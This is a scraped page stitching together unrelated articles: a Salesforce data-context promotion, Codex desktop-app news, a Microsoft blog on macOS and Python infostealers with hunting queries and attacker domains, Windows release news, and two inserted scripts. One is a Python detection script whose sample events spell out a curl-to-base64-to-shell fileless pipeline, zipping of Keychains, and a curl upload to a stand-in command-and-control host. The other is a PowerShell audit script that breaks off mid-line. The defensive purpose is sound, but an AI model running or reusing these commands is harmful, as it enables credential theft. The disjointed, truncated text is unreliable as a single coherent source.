AI is ubiquitous in both the consumer and enterprise sectors. Yet few organizations are realizing AI’s full potential. Why? AI agents must make decisions and take actions based on a limited subset of overall data. Result: too much guesswork, the occasional hallucination, and failure to extract full value from AI.
The downfall of enterprise AI, then, is agents that falter without a comprehensive understanding of data, both customer- and business-derived. Companies need to be able to pivot from simple data ingestion to sophisticated content collection, integration, and curation that enable AI agents to respond accurately and take appropriate actions.
This can only be accomplished by advancing from traditional prompt engineering to context engineering, which combines a 360-degree view of the customer and a complete enterprise view of a dynamically changing business.
Why enterprise AI is data-rich but context-poor
Many companies implementing AI are data-rich. They use large language models (LLMs) that pull data from all over the internet. They have in-house models that access data from customer databases and product documentation libraries.
Their agents access these pools of information and attempt to guide their decisions. Sometimes they get it right. But too often, they take the wrong action or recommend an incorrect response. What is missing is end-to-end context.
Here is a common example: A person wants to buy a car, so before finalizing their purchase, they go on the manufacturer’s website to research the various options. This data is captured in the car maker’s systems, and over the following weeks, AI directs a series of marketing actions to generate interest in the car model. Without full context, the marketing agent doesn’t recognize that the person has already purchased the car.
This breakdown occurs when one system contains the details of a car purchase, another has records on the individual buyer, and a separate application tracks customer engagement details (such as website visits). Robbed of the rich context of data locked inside information silos, AI digital engagement agents only know that someone researched a car. They’ve missed the opportunity to promote extended warranties and maintenance plans.
Far from rare, such examples are all too common in agentic AI. Enterprises may be data-rich but are context-poor.
Key elements for achieving fluid, unified data
For AI to respond contextually, data needs to be fluid, harmonized, and unified. The walls between silos must be removed.
Achieving this requires several key elements:
Data catalog: The data catalog provides a single view of data across systems. This gives apps and AI agents a map of all assets residing in on-premises systems, the cloud, data lakes, and legacy infrastructure.
Data lineage: Consider this a data verification layer. It traces the full journey of data from origin to consumption, showing every change or transformation along the way. Data lineage enables AI agents to know where any piece of data came from, how it was produced, whether it aligns with organizational governance and regulatory compliance policies, whether it is secure and trustworthy, and whether it reflects the most current knowledge.
Connected signals and actions: Apps and AI agents rely on signals from every system to interpret what’s happening and trigger secure, meaningful actions.
Unified data context: There must be a central repository within an agentic AI architecture that collects, synthesizes, harmonizes, and unifies all information. This context interface for apps and AI agents must operate in real time without requiring file copying or data movement. Whether an AI agent is analyzing a trend or processing a product return, it must provide a single, shared, up-to-the-second view of the customer and the business, aligned with all relevant policies.
Enterprise understanding: Apps and AI agents should not have to relearn the business from scratch. They must act in accordance with the definitions, rules, and principles that underlie each portion of the business. If they don’t, they may appear “AI smart” but “corporate stupid.” Why? Deep metadata intelligence in the enterprise is unavailable to customer-facing systems.
Building enterprise understanding for smarter AI
Enterprise context is vital in defining core business entities and their interrelationships. This context encompasses historical records, master data management (of products, suppliers, assets, and more), business rules, regulatory compliance, and organizational workflows. Comprehensive customer and enterprise records must be unified to supply AI agents with a shared data vocabulary that helps them infer the right context for the right situation at the right time.
Case in point: Large enterprises typically include numerous accounts and corporate entities. The names of various entities may be similar, but there are hierarchies, as well as specific rules and tax schemes that apply by geography and industry. In such a complex organizational structure, if names are entered incorrectly or data is assigned to the wrong corporate entity, AI-based errors are practically inevitable.
Why complete context is key to preventing AI errors
Only the complete unification of customer and enterprise metadata and systems can prevent costly errors and keep AI agents and apps supplied with the applicable context. This way, organizations can consolidate all enterprise and customer data and connect related data from multiple sources to transform trusted context into a meaningful story.
Learn more about Data 360 from Salesforce and how it transforms scattered, fragmented enterprise data into one complete view of your business to fuel real-time workflows, better decision making, and more intelligent agents.
OpenAI is betting that coding agents are outgrowing the terminal.
The company launched a macOS desktop app on Monday for its Codex software development agent, which focuses less on the code itself and more on managing multiple software development agents in parallel.
Until now, the main way to interact with Codex was through the terminal, similar to Anthropic’s Claude Code or Google’s Gemini CLI. While the new desktop app still allows developers to drop into an IDE like VS Code or the terminal for hands-on work, OpenAI’s mission with this app is to make agentic coding more accessible to a wider range of users — even those who may never want to touch the code itself.
As OpenAI CEO Sam Altman pointed out during a press briefing ahead of Monday’s launch, over the last few months, software agents have “crossed a threshold of real utility.”
More than a million people already use Codex regularly, he said, but because these agents are now so capable, the team also wanted to look into ways to make them more accessible to a wider audience.
“5.2 [Codex] in particular is a model that many of us have found can do extremely complex things. We realized we started to feel limited by the interface. And so as we have gotten to these incredible reasoning models with this incredible capability, and we’ve been thinking about what we need to do to make it easy for people to get use of that capability. We have made this Codex app, which is a way to work with the model and manage agents as they do these like long-horizon tasks running on your laptop,” Altman explains.
The Codex team also argues that as developers begin trusting their agents with more complex work, an app like Codex is necessary to help them orchestrate and supervise them.
“Existing IDEs and terminal-based tools are not built to support this way of working,” OpenAI argues in its announcement.
Using skills in the Codex desktop app (credit: OpenAI).
Developers can point the Codex app at existing repositories, and it integrates directly with GitHub for creating pull requests. Multiple agents can run in parallel, and developers can switch back and forth between different tasks just like they would switch between files in an IDE, because the agents all run in separate threads.
Since Codex supports Git worktrees, multiple agents can work on the same repo in parallel, each using an isolated copy of that code.
From vibe coding to software engineering
As Altman noted, one question the company has been asking itself is whether these agents can transition from vibe coding to serious software engineering. Altman believes so.
“I think we’re over the bar for that,” he says. “I think this will be the way that most serious coders do their job in very rapidly from now.”
Codex beyond code
One interesting aspect of Codex is that it isn’t just about writing code. As Anthropic quickly realized with Claude Code, the core agentic loop that powers these tools is also useful for automating other kinds of workflows. Anthropic launched Cowork as a separate app for this use case, but OpenAI notes that Codex users can use Agent Skills to extend Codex to do this.
With skills, users can “extend Codex beyond code generation to tasks that require gathering and synthesizing information, problem-solving, writing, and more,” the team writes.
That’s not something OpenAI is emphasizing in this release, but given that the company has set its sights on enterprise use cases, we’ll likely hear much more about this in the future.
Availability
Codex is now available to anyone with a ChatGPT account, including, for a limited time, ChatGPT free and Go users. For those on paid ChatGPT Plus, Pro, Business, Enterprise, and Edu plans, OpenAI is doubling the rate limits during this time.
The merger creates the world's most valuable private company, and paves the way for Musk to try and prove out the usefulness of space-based data centers.
Infostealer threats are rapidly expanding beyond traditional Windows-focused campaigns, increasingly targeting macOS environments, leveraging cross-platform languages such as Python, and abusing trusted platforms and utilities to silently deliver credential-stealing malware at scale. Since late 2025, Microsoft Defender Experts has observed macOS-targeted infostealer campaigns using social engineering techniques—including ClickFix-style prompts and malicious DMG installers—to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS).
These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, and secrets from browsers, keychains, and developer environments. At the same time, attackers are leveraging Python-based stealers to adapt rapidly, reuse code, and target heterogeneous environments with minimal overhead. Other threat actors are abusing trusted platforms and utilities—including WhatsApp and PDF converter tools—to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.
This blog examines how modern infostealers operate across operating systems and delivery channels by blending into legitimate ecosystems and evading conventional defenses. We provide comprehensive detection coverage through Microsoft Defender XDR and actionable guidance to help organizations detect, mitigate, and respond to these evolving threats.
Activity overview
macOS users are being targeted through fake software and browser tricks
Mac users are encountering deceptive websites—often through Google Ads or malicious advertisements—that either prompt them to download fake applications or instruct them to copy and paste commands into their Terminal. These “ClickFix” style attacks trick users into downloading malware that steals browser passwords, cryptocurrency wallets, cloud credentials, and developer access keys.
Three major Mac-focused stealer campaigns include DigitStealer (distributed through fake DynamicLake software), MacSync (delivered via copy-paste Terminal commands), and Atomic Stealer (using fake AI tool installers). All three harvest the same types of data—browser credentials, saved passwords, cryptocurrency wallet information, and developer secrets—then send everything to attacker servers before deleting traces of the infection.
Stolen credentials enable account takeovers across banking, email, social media, and corporate cloud services. Cryptocurrency wallet theft can result in immediate financial loss. For businesses, compromised developer credentials can provide attackers with access to source code, cloud infrastructure, and customer data.
Phishing campaigns are delivering Python-based stealers to organizations
The proliferation of Python information stealers has become an escalating concern. This gravitation towards Python is driven by ease of use and the availability of tools and frameworks that allow quick development, even for individuals with limited coding knowledge. In line with this trend, Microsoft Defender Experts observed multiple Python-based infostealer campaigns over the past year. They are typically distributed via phishing emails and collect login credentials, session cookies, authentication tokens, credit card numbers, and crypto wallet data.
PXA Stealer, one of the most notable Python-based infostealers seen in 2025, harvests sensitive data including login credentials, financial information, and browser data. Linked to Vietnamese-speaking threat actors, it targets government and education entities through phishing campaigns. In October 2025 and December 2025, Microsoft Defender Experts investigated two PXA Stealer campaigns that used phishing emails for initial access, established persistence via registry Run keys or scheduled tasks, downloaded payloads from remote locations, collected sensitive information, and exfiltrated the data via Telegram. To evade detection, we observed the use of legitimate services such as Telegram for command-and-control communications, obfuscated Python scripts, malicious DLLs being sideloaded, the Python interpreter masquerading as a system process (i.e., svchost.exe), and the use of signed binaries and living-off-the-land binaries (LOLBins).
Due to the growing threat of Python-based infostealers, it is important that organizations protect their environment by being aware of the tactics, techniques, and procedures used by the threat actors who deploy this type of malware. Being compromised by infostealers can lead to data breaches, unauthorized access to internal systems, business email compromise (BEC), supply chain attacks, and ransomware attacks.
Attackers are weaponizing WhatsApp and PDF tools to spread infostealers
Since late 2025, platform abuse has become an increasingly prevalent tactic wherein adversaries deliberately exploit the legitimacy, scale, and user trust associated with widely used applications and services.
WhatsApp Abused to Deliver Eternidade Stealer: During November 2025, Microsoft Defender Experts identified a WhatsApp platform abuse campaign leveraging multi-stage infection and worm-like propagation to distribute malware. The activity begins with an obfuscated Visual Basic script that drops a malicious batch file launching PowerShell instances to download payloads.
One of the payloads is a Python script that establishes communication with a remote server and leverages WPPConnect to automate message sending from hijacked WhatsApp accounts, harvests the victim’s contact list, and sends malicious attachments to all contacts using predefined messaging templates. Another payload is a malicious MSI installer that ultimately delivers Eternidade Stealer, a Delphi-based credential stealer that continuously monitors active windows and running processes for strings associated with banking portals, payment services, and cryptocurrency exchanges including Bradesco, BTG Pactual, MercadoPago, Stripe, Binance, Coinbase, MetaMask, and Trust Wallet.
Malicious Crystal PDF installer campaign: In September 2025, Microsoft Defender Experts discovered a malicious campaign centered on an application masquerading as a PDF editor named Crystal PDF. The campaign leveraged malvertising and SEO poisoning through Google Ads to lure users. When executed, CrystalPDF.exe establishes persistence via scheduled tasks and functions as an information stealer, covertly hijacking Firefox and Chrome browsers to access sensitive files in AppData\Roaming, including cookies, session data, and credential caches.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of the macOS‑focused, Python‑based, and platform‑abuse infostealer threats discussed in this report. These recommendations draw from established Defender blog guidance patterns and align with protections offered across Microsoft Defender XDR.
Organizations can follow these recommendations to mitigate the threats described in this report:
Strengthen user awareness & execution safeguards
Educate users on social‑engineering lures, including malvertising redirect chains, fake installers, and ClickFix‑style copy‑paste prompts common across macOS stealer campaigns such as DigitStealer, MacSync, and AMOS.
Discourage installation of unsigned DMGs or unofficial “terminal‑fix” utilities; reinforce safe‑download practices for consumer and enterprise macOS systems.
Harden macOS environments against native tool abuse
Monitor for suspicious Terminal activity—especially execution flows involving curl, Base64 decoding, gunzip, osascript, or JXA invocation, which appear across all three macOS stealers.
Detect patterns of fileless execution, such as in‑memory pipelines using curl | base64 -d | gunzip, or AppleScript‑driven system discovery and credential harvesting.
Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
Control outbound traffic & staging behavior
Inspect network egress for POST requests to newly registered or suspicious domains—a key indicator for DigitStealer, MacSync, AMOS, and Python‑based stealer campaigns.
Detect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts.
Block direct access to known C2 infrastructure where possible, informed by your organization’s threat‑intelligence sources.
Protect against Python-based stealers & cross-platform payloads
Harden endpoint defenses around LOLBIN abuse, such as certutil.exe decoding malicious payloads.
Evaluate activity involving AutoIt and process hollowing, common in platform‑abuse campaigns.
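The monitoring guidance above (fileless curl pipelines, osascript invocation, certutil decoding, and ZIP staging under /tmp followed by an outbound POST), together with the renamed-Python-interpreter masquerading described for PXA Stealer, expressed as rule-based triage over process events. This is an added example, not Microsoft's detection logic: the event field names mirror the hunting queries later on this page, and every sample event, hostname, path and the 300-second staging window are constructed assumptions.

```python
"""Rule-based triage of endpoint process events for the infostealer tradecraft
described in this report. Added illustration, not Microsoft's detection logic:
field names mirror the page's hunting queries (FileName, ProcessCommandLine,
VersionInfoOriginalFileName); all events, domains and thresholds are constructed."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    device: str
    ts: int                  # event time in seconds (constructed clock)
    file_name: str           # FileName as seen on disk
    original_file_name: str  # PE version-info original name ("" on macOS)
    command_line: str        # ProcessCommandLine


@dataclass(frozen=True)
class Finding:
    device: str
    rule: str
    ts: int
    detail: str


# Stateless rules over a single command line:
# 1. download-decode-execute pipeline (curl | base64 -d | gunzip | sh)
# 2. AppleScript / JXA invocation used for discovery and collection
# 3. certutil abused as a decoder (LOLBIN)
STATELESS_RULES = [
    ("fileless_pipeline",
     re.compile(r"\bcurl\b.*\|\s*base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:gunzip|sh|bash|zsh)\b", re.I)),
    ("osascript_activity",
     re.compile(r"\bosascript\b.*(?:-l\s+JavaScript|-e\s+)", re.I)),
    ("certutil_decode",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-decode\b", re.I)),
]

# Interpreter masquerading: the file is named svchost.exe but the PE version
# info still names the Python interpreter (the PXA Stealer pattern above).
PYTHON_ORIGINAL_NAMES = {"python.exe", "pythonw.exe"}

# Stateful rule: a ZIP written under /tmp by zip/ditto, then a curl POST from
# the same device within STAGING_WINDOW_S seconds (staging then exfiltration).
ZIP_STAGING = re.compile(r"(?:^|[\s/])(?:zip|ditto)\s.*?\s(/tmp/\S+\.zip)\b", re.I)
CURL_POST = re.compile(r"\bcurl\b.*(?:-X\s*POST|-F\s+file=@)", re.I)
STAGING_WINDOW_S = 300  # constructed threshold


def triage(events: list[ProcessEvent]) -> list[Finding]:
    """Return one Finding per matched rule, processing events in time order."""
    findings: list[Finding] = []
    staged = defaultdict(list)  # device -> [(ts, zip path)]
    for ev in sorted(events, key=lambda e: e.ts):
        cl = ev.command_line
        for name, pattern in STATELESS_RULES:
            if pattern.search(cl):
                findings.append(Finding(ev.device, name, ev.ts, cl))
        if (ev.file_name.lower() == "svchost.exe"
                and ev.original_file_name.lower() in PYTHON_ORIGINAL_NAMES):
            findings.append(Finding(ev.device, "renamed_python_interpreter", ev.ts,
                                    f"{ev.file_name} has original name {ev.original_file_name}"))
        m = ZIP_STAGING.search(cl)
        if m:
            staged[ev.device].append((ev.ts, m.group(1)))
        if CURL_POST.search(cl):
            recent = [p for t, p in staged[ev.device] if 0 <= ev.ts - t <= STAGING_WINDOW_S]
            if recent:
                findings.append(Finding(ev.device, "staging_then_exfil", ev.ts,
                                        "POST after staging " + ", ".join(recent)))
    return findings


# Constructed sample telemetry; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcessEvent("mac-01", 100, "sh", "",
                 'sh -c "curl -fsSL https://c2.example.invalid/p | base64 -d | gunzip | sh"'),
    ProcessEvent("mac-01", 105, "osascript", "", "osascript -e 'system info'"),
    ProcessEvent("mac-01", 110, "zip", "", "zip -r /tmp/out.zip /Users/alice/Library/Keychains"),
    ProcessEvent("mac-01", 130, "curl", "",
                 'curl -k -X POST -H "api-key: x" --max-time 30 -F file=@/tmp/out.zip https://c2.example.invalid/api'),
    ProcessEvent("win-07", 200, "svchost.exe", "pythonw.exe", "svchost.exe C:\\Users\\Public\\update.py"),
    ProcessEvent("win-07", 210, "certutil.exe", "certutil.exe",
                 "certutil.exe -decode C:\\Users\\Public\\a.txt C:\\Users\\Public\\a.exe"),
    # Benign activity that must not fire: plain download, local backup, real svchost.
    ProcessEvent("mac-02", 300, "curl", "", "curl -fsSL -o /tmp/notes.txt https://docs.example.invalid/notes.txt"),
    ProcessEvent("mac-02", 310, "zip", "", "zip -r /tmp/backup.zip /Users/bob/Documents"),
    ProcessEvent("win-08", 400, "svchost.exe", "svchost.exe", "svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.device} t={f.ts} {f.rule}: {f.detail}")
```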
Microsoft also recommends the following mitigations to reduce the impact of this threat:
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Allow investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to prevent attackers from using local administrator privileges to set antivirus exclusions.
Microsoft Defender XDR customers can also implement the following attack surface reduction rules to harden an environment against LOLBAS techniques used by threat actors:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic: Execution
Observed activity: Encoded PowerShell commands downloading payload; execution of various commands and scripts via osascript and sh
Microsoft Defender for Endpoint: Suspicious Powershell download or encoded command execution; Suspicious shell command execution; Suspicious AppleScript activity; Suspicious script launched
Tactic: Persistence
Observed activity: Registry Run key created; scheduled task created for recurring execution; LaunchAgent or LaunchDaemon for recurring execution
Microsoft Defender for Endpoint: Anomaly detected in ASEP registry; Suspicious Scheduled Task Launched; Suspicious Pslist modifications; Suspicious launchctl tool activity
Microsoft Defender Antivirus: Trojan:AtomicSteal.F
Tactic: Defense Evasion
Observed activity: Unauthorized code execution facilitated by DLL sideloading and process injection; renamed Python interpreter executes obfuscated Python script; payload decoded with certutil; renamed AutoIT interpreter binary and AutoIT script; data staging directories deleted
Microsoft Defender for Endpoint: An executable file loaded an unexpected DLL file; A process was injected with potentially malicious code; Suspicious Python binary execution; Suspicious certutil activity; 'Obfuse' malware was prevented; Rename AutoIT tool; Suspicious path deletion
Microsoft Defender Antivirus: Trojan:Script/Obfuse!MSR
Tactic: Credential Access
Observed activity: Credential and secret harvesting; cryptocurrency probing
Microsoft Defender for Endpoint: Possible theft of passwords and other sensitive web browser information; Suspicious access of sensitive files; Suspicious process collected data from local system; Unix credentials were illegitimately accessed
Tactic: Discovery
Observed activity: System information queried using WMI and Python
Microsoft Defender for Endpoint: Suspicious System Hardware Discovery; Suspicious Process Discovery; Suspicious Security Software Discovery; Suspicious Peripheral Device Discovery
Tactic: Command and Control
Observed activity: Communication to command and control server
Microsoft Defender for Endpoint: Suspicious connection to remote service
Tactic: Collection
Observed activity: Sensitive browser information compressed into ZIP file for exfiltration
Microsoft Defender for Endpoint: Compression of sensitive data; Suspicious Staging of Data; Suspicious archive creation
Tactic: Exfiltration
Observed activity: Exfiltration through curl
Microsoft Defender for Endpoint: Suspicious file or content ingress; Remote exfiltration activity; Network connection by osascript
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Defender XDR customers can run the following queries to find related activity in their networks:
Use the following queries to identify activity related to DigitStealer
// Identify suspicious DynamicLake disk image (.dmg) mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev' , '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'
// Identify data exfiltration to DigitStealer C2 API endpoints.
DeviceProcessEvents
| where InitiatingProcessFileName has_any ('bash', 'sh')
| where ProcessCommandLine has_all ('curl', '--retry 10')
| where ProcessCommandLine contains 'hwid='
| where ProcessCommandLine endswith "api/credentials"
or ProcessCommandLine endswith "api/grabber"
or ProcessCommandLine endswith "api/log"
| extend APIEndpoint = extract(@"/api/([^\s]+)", 1, ProcessCommandLine)
Use the following queries to identify activity related to MacSync
// Identify exfiltration of staged data via curl
DeviceProcessEvents
| where InitiatingProcessFileName =~ "zsh" and FileName =~ "curl"
| where ProcessCommandLine has_all ("curl -k -X POST -H", "api-key: ", "--max-time", "-F file=@/tmp/", ".zip", "-F buildtxd=")
Use the following queries to identify activity related to Atomic Stealer (AMOS)
// Identify suspicious AlliAi disk image (.dmg) mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev', '-o quarantine')
| where ProcessCommandLine contains '/Volumes/ALLI'
Use the following queries to identify activity related to PXA Stealer: Campaign 1
// Identify activity initiated by renamed python binary
DeviceProcessEvents
| where InitiatingProcessFileName endswith "svchost.exe"
| where InitiatingProcessVersionInfoOriginalFileName == "pythonw.exe"
// Identify network connections initiated by renamed python binary
DeviceNetworkEvents
| where InitiatingProcessFileName endswith "svchost.exe"
| where InitiatingProcessVersionInfoOriginalFileName == "pythonw.exe"
Use the following queries to identify activity related to PXA Stealer: Campaign 2
// Identify malicious Process Execution activity
DeviceProcessEvents
| where ProcessCommandLine has_all ("-y","x",@"C:","Users","Public", ".pdf") and ProcessCommandLine has_any (".jpg",".png")
// Identify suspicious process injection activity
DeviceProcessEvents
| where FileName == "cvtres.exe"
| where InitiatingProcessFileName has "svchost.exe"
| where InitiatingProcessFolderPath !contains "system32"
Use the following queries to identify activity related to WhatsApp Abused to Deliver Eternidade Stealer
// Identify the files dropped from the malicious VBS execution
DeviceFileEvents
| where InitiatingProcessCommandLine has_all ("Downloads",".vbs")
| where FileName has_any (".zip",".lnk",".bat") and FolderPath has_all ("\\Temp\\")
// Identify batch script launching powershell instances to drop payloads
DeviceProcessEvents
| where InitiatingProcessParentFileName == "wscript.exe" and InitiatingProcessCommandLine has_any ("instalar.bat","python_install.bat")
| where ProcessCommandLine !has "conhost.exe"
// Identify AutoIT executable invoking malicious AutoIT script
DeviceProcessEvents
| where InitiatingProcessCommandLine has ".log" and InitiatingProcessVersionInfoOriginalFileName == "Autoit3.exe"
Use the following queries to identify activity related to Malicious CrystalPDF Installer Campaign
// Identify network connections to C2 domains
DeviceNetworkEvents
| where InitiatingProcessVersionInfoOriginalFileName == "CrystalPDF.exe"
// Identify scheduled task persistence
DeviceEvents
| where InitiatingProcessVersionInfoProductName == "CrystalPDF"
| where ActionType == "ScheduledTaskCreated"
Deceptive domain that redirects user after CAPTCHA verification (AMOS campaign)
ai[.]foqguzz[.]com
Domain
Redirected domain used to deliver unsigned disk image. (AMOS campaign)
day.foqguzz[.]com
Domain
C2 server (AMOS campaign)
bagumedios[.]cloud
Domain
C2 server (PXA Stealer: Campaign 1)
Negmari[.]com Ramiort[.]com Strongdwn[.]com
Domain
C2 servers (Malicious Crystal PDF installer campaign)
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Jason Willems believes the tech monoculture is finally breaking, Don Ho shares some bad Notepad++ news, Tailscale’s Avery Pennarun pens a great downtime apology, Milan Milanović explains why you can only code 4 hours per day, and Addy Osmani on managing comprehension debt when leaning on AI to code.
Welcome to the January 2026 Windows news you can use, including new capabilities in Windows Backup for Organizations and Windows 365.
Coming up on February 5, there will be another Secure Boot AMA, so please tune in to get answers to your questions. Then, on Mondays in March, join us for deep dives, AMAs, and more at Microsoft Technical Takeoff for Windows and Microsoft Intune. Check out the full schedule and start adding sessions to your calendar. Now, let's get started with the latest news you can use.
New in Windows update and device management
[BACKUP] [RESTORE] – Windows Backup for Organizations is expanding to include a new restore experience at first sign-in. In early 2026, Windows 11 users will be able to restore their Windows settings and Microsoft Store app list at the very first sign-in, even on Microsoft Entra hybrid join devices and in multi-user setups.
[WINDOWS 365] – Windows 365 is now available in the Brazil South region. Your organization can now provision Cloud PCs closer to your users in Brazil and across South America, helping reduce latency and support regional data residency requirements.
[INTUNE] – Get insights from the experts by watching last week's Intune edition of Tech Community Live, now available on demand. Learn how to secure endpoints with policy and Microsoft Defender, manage apps, and apply Zero Trust best practices when managing devices in Intune.
New in Windows security
[NETWORK] [ACCESS] – Windows is moving toward a more secure authentication model by phasing out New Technology LAN Manager (NTLM) in favor of stronger, Kerberos‑based alternatives. Get familiar with the phased roadmap for NTLM disablement and tools that will help prepare your organization for this change.
[WINDOWS HELLO] – The January 2026 optional non-security update starts the gradual rollout of support for peripheral fingerprint sensors with Windows Hello Enhanced Sign-in Security (ESS).
[SECURE BOOT] – The Secure Boot playbook has been updated to make it easier to identify the steps and tools to help you proactively update Secure Boot certificates across your estate before they start expiring in June of 2026. Have questions? Post them now, then tune in for the Secure Boot AMA on February 5, 2026 at 8:00 AM PT.
[SECURE BOOT] [INTUNE] – You can now deploy, manage, and monitor Secure Boot certificate updates using Microsoft Intune. Step-by-step guidance is now available and has been added to the Secure Boot playbook for easy reference. Additionally, a new Secure Boot status report is now available in Windows Autopatch.
[SECURE BOOT] [WINDOWS UPDATE] – Starting with the January 2026 security update, Windows quality updates include a subset of high confidence device targeting data that identifies devices eligible to automatically receive new Secure Boot certificates. Devices will receive the new certificates only after demonstrating sufficient successful update signals, ensuring a safe and phased deployment.
[DATA PROTECTION] – With the January 2026 optional non-security update, IT admins can now set how often Data Protection Application Programming Interface (DPAPI) domain backup keys rotate automatically. This strengthens cryptographic security and reduces reliance on older encryption algorithms.
[VIRTUALIZATION] [CLOUD PC] – A unified, policy-driven way to control which RDP Shortpath modes (Managed, Public/STUN, Public/TURN) are enabled across Azure Virtual Desktop session hosts and Windows 365 Cloud PCs is now available. Explore RDP Shortpath configuration via Group Policy or Microsoft Intune.
[M365] – Starting February 9, 2026, Microsoft will continue to ramp up enforcement, and users will be unable to sign in to the Microsoft 365 admin center without successfully completing multifactor authentication.
[WDS] – Starting with the January 2026 security update, you can explicitly disable WDS hands-free deployment with the help of new Event Log alerts and registry key options. In April 2026, hands-free deployment will be disabled by default. After that date, it will no longer work unless explicitly overridden with registry settings.
New in AI
[WINDOWS 365] – Windows 365 for Agents introduces a set of capabilities that make it possible to run autonomous AI agents securely on Cloud PCs. Enhancements will help you automate complex tasks, reduce idle costs, and ensure trust in autonomous operations.
To learn about the latest capabilities for Copilot+ PCs, visit the Windows Roadmap and filter Platform by "Copilot+ PC Exclusives."
[START MENU] – The redesigned Start menu continues its gradual rollout to Windows devices. As the rollout progresses, more Windows devices will receive the redesigned Start menu experience.
New features and improvements are coming in the February 2026 security update. You can preview them by installing the January 2026 optional non-security update for Windows 11, version 25H2 and version 24H2. This update includes the gradual rollout of:
[MOBILE] – Cross‑Device Resume is expanding to include the ability to continue activities from your Android phone on your PC based on the apps and services you use, including resuming Spotify playback, working in Word, Excel, or PowerPoint, or continuing a browsing session.
[NARRATOR] – Narrator now gives you more control over how it announces on‑screen controls. You can choose which details are spoken and adjust their order to match how you navigate apps.
[VOICE ACCESS] – Voice Access setup has been streamlined to make it easier to get started. The redesigned experience helps you download a speech model for your chosen language, select your preferred input microphone, and learn what Voice Access can help you do on your Windows PC. You can also now adjust the amount of delay before a voice command runs.
[AUDIO] – Windows now offers enhanced support for MIDI 1.0 and MIDI 2.0, including full WinMM and WinRT MIDI 1.0 support with built-in translation, shared MIDI ports across apps, custom port names, loopback, and app-to-app MIDI.
[SETTINGS] – The Device card on the Settings home page appears when you sign in with your Microsoft account. It now shows key specifications and usage details for your PC.
[COPILOT+ PC] – The Settings Agent now supports more languages, with expanded support for German, Portuguese, Spanish, Korean, Japanese, Hindi, Italian, and Chinese (Simplified).
New for developers
[APPS] [TOOLS] – The Windows App Development CLI (winapp) is now available in public preview. It's a new open-source command-line tool designed to simplify the development lifecycle for Windows applications across a wide range of frameworks and toolchains.
[ACTIVE DIRECTORY] – Guidance is now available to help mitigate potential threats to Active Directory Domain Services, including authentication relay attacks, Kerberoasting, and unconstrained delegation.
[KERBEROS] – The first phase of protections designed to address a Kerberos information disclosure vulnerability is now available. It includes new auditing and optional configuration controls that help reduce reliance on legacy encryption types such as RC4 and prepare domain controllers.
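The Active Directory guidance and the Kerberos hardening above describe conditions you can enumerate directly from the directory. The script below is an added example and not Microsoft's guidance or tooling: a read-only audit that lists user accounts exposed to Kerberoasting (accounts with an SPN, flagged if they still accept RC4), every principal configured for unconstrained delegation, and whether the local domain controller requires LDAP signing, LDAP channel binding and SMB signing, which are the controls that block authentication relay. It assumes the ActiveDirectory RSAT module and a domain-joined session; the registry value names and msDS-SupportedEncryptionTypes bit values are the documented ones.

```powershell
# Added example (not Microsoft's guidance): audit the AD conditions called out above.
# Assumes the ActiveDirectory module (RSAT) and a domain-joined, domain-user session.
Import-Module ActiveDirectory

# Bit values of msDS-SupportedEncryptionTypes (MS-KILE).
$DES_CRC = 0x1; $DES_MD5 = 0x2; $RC4 = 0x4; $AES128 = 0x8; $AES256 = 0x10
# userAccountControl flag for unconstrained delegation.
$TRUSTED_FOR_DELEGATION = 0x80000

function Get-KerberoastCandidate {
    # Any authenticated user can request a service ticket for an account with an SPN;
    # if that ticket is RC4 (or the password is weak) it is crackable offline.
    # An unset msDS-SupportedEncryptionTypes means the account still negotiates RC4.
    Get-ADUser -LDAPFilter '(&(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))' `
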